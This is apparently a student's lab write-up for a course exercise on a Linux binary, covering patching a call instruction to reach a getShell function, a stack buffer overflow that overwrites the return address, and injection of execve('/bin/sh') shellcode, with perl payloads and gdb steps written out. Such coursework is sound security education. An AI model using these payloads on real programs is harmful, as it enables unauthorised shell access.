2018-3-7 20155317 王新玮 Exp1 PC平台逆向破解(5)M
2018-3-7 20155317 王新玮 Exp1 PC平台逆向破解(5)M
任务要求:手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
NOP、JNE、JE、JMP、CMP汇编指令的机器码:
NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90)
JNE:条件转移指令,如果不相等则跳转。(机器码:75)
JE:条件转移指令,如果相等则跳转。(机器码:74)
JMP:无条件转移指令。段内直接短转Jmp short(机器码:EB)段内直接近转移Jmp near(机器码:E9)段内间接转移Jmp word(机器码:FF)段间直接(远)转移Jmp far(机器码:EA)
CMP:比较指令,功能相当于减法指令,只是对操作数之间运算比较,不保存结果。cmp指令执行后,将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。
在开始之前,我们首先要学会两样东西
1.反汇编
objdump -d pwn1(文件名)|more
这条命令的用途是将可执行程序进行反汇编,变成机器指令
2.其次呢我们要学会使用vi编辑器, 我们用vi查看pwn1,输入:
vi pwn1
vi pwn1(文件名) linux下的vi编辑器功能十分强大,不仅可以编辑任何一个文件,而且可以以不同进制进行查看,如下图,进入编辑界面后,敲入
:%!xxd
,则以16进制进行查看。
本次实验要做的是通过修改指令,修改指令间的跳转:在完成本次任务之前,我们先来看一下本次实验的原理:
如下图所示:我们可以看到,在机器语言中,调用指令最根本的是找到了指令所在的偏移地址,例如下图中main的地址为080484af,而call指令后面的8048491对应的是foo函数的地址。所以说,如果想要改变指令的调用,那么我们只需要修改偏移地址的值就可以了。
而且从下图中我们可以看到,前后两者是一一对应的,也就是说,如果改变前着的值,那么对应后面的指令跳转我们也能相应的改变。
完成这些之后呢,我们就能知道e8对应的就是call指令,而e8之后的数字代表着调用函数的偏移地址,我们只需要将foo函数的地址变成getshell函数的地址就可以了
从上图中我们可以看到,foo函数的地址为08048291,getshellh函数的地址为0804847d,用16进制的减法我们可以精确的算出getshell比foo低了14,也就在原来的基础上减去14即可。而在linux环境下,采用小端存储的方式,也就是说d7为低位,就是说将到d7减去14即可,也就是变成c3。完成这些以后,我们采用vi编辑器进行修改。
我们在下面输入:/e8表示查询e8.然后,点击i键进行修改。将d7写为c3,然后按下esc,输入:wq保存退出。
/e8 d7 \\查找
%!xxd - r \\恢复二进制格式 :wq \\保存退出
再次进行objdump -d 进行查看
这样我们就完成了本次任务的实验操作。
实验过程中可能出现的问题:
如果是64位的卡里虚拟机,无法运行可以参考老师写的博客:http://www.cnblogs.com/zl20154312/p/8511455.html,其中如果出现源链接连接不上的情况,可以填入以下链接 :deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
BOF攻击,改变程序执行流程
首先我们要明白什么事BOF攻击,就是在程序的堆栈当中,写入过量的数据,导致缓冲区溢出,最后影响到其他地方(ret)的值,从而产生攻击效果。
首先,我们需要测试出该程序的缓冲区到底有多长。我们采用gdb进行调试:
gdb 20155317 //调试
r //运行
11111111222222223333333344444444555555555 //输入数据
完成之后我们需要查看一下此时寄存器里的值,来检查出哪些值溢出了。
从图中我们可以看到eip中的值变成了0x35这表示5被溢出了,我们再次输入111111112222222233333333444444441234,进行尝试
我们发酵确实是1234这四位溢出了,因此我们只要控制好这四位的值是shell函数的首地址,那么当再次溢出的时候,跳转到的就是shell函数了。从开始的图中我们可以得知shell函数的地址为0804847d。,但是我们无法直接输入这几个值,时候需要我们利用到
perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
我们这是利用语言将我们想要输入的数据保存到input这个文档里。
我们利用16进制查看一下input的内容:xxd input
我们利用管道将文件里的数据传入到程序当中:
(cat input ; cat)|./20155317
我们发现,在输入ls命令后显示出了当前文件夹下的内容,所以缓冲区溢出攻击成功,该程序已经跳转到shell函数中。
shellcode注入
shellcode的注入其实是在上一个的基础上衍生出来的,基本的思想是在运行程序时,对程序进行调试,从而进行注入。
首先,我们需要将shellcode的代码写入文件中,并运行该程序
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
完成之后,我们再打开一个终端,对其进程号进行查询
ps -ef | grep
我们可以得出该进程的进程号为:2586。完成以后我们启用gdb进行调试,完成后查看内存地址
gdb //启动调试
attach 2586 //连接到进程
diassemble foo //查看注入buf的内存地址
在ret上设置断点
查看测试寄存及的值
从里面我们找到了1234,至此我们可以找到shellcode的首地址了,所以我们将1234的部分改成:\x00\xd3\xff\xff\x00,所以shellcode就变成
perl -e 'print "A" x 32;print "\x60\xd4\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
我们更改shellcode并且注入一下:
程序
最新文章
- PHP的排序算法跟查找算法
- 界面绚丽的SharePoint仪表盘控件Nevron Gauge for SharePoint 控件详细介绍
- C# 7.0 新特性3: 模式匹配
- 将excel文件中的数据导入到mysql
- Java 类装载器
- kvm虚似机监控
- 10个免费的PHP编辑器/开发工具
- DOM 之 SAX操作
- C盘空间不足
- 关于移动端和PC端的交互的区别
- 框架搭建资源 (二) 添加M(模型)
- Working with Entity Relations in OData
- 修复TortoiseGit文件夹和文件图标不显示
- Druid 配置及内置监控,Web页面查看监控内容 【我改】
- mysql原理~创建用户的那些事情
- [原]openstack-kilo--issue(十九) ImportError: Could not import settings 'openstack_dashboard.settings' (Is it on sys.path? Is there an import error in the settings file?): No module named main
- 直和 direct sum
- 写个发邮件的功能php的(全代码)
- 微信小程序 - 下拉刷新(非组件)
- UI设计 - 手机列表风格总结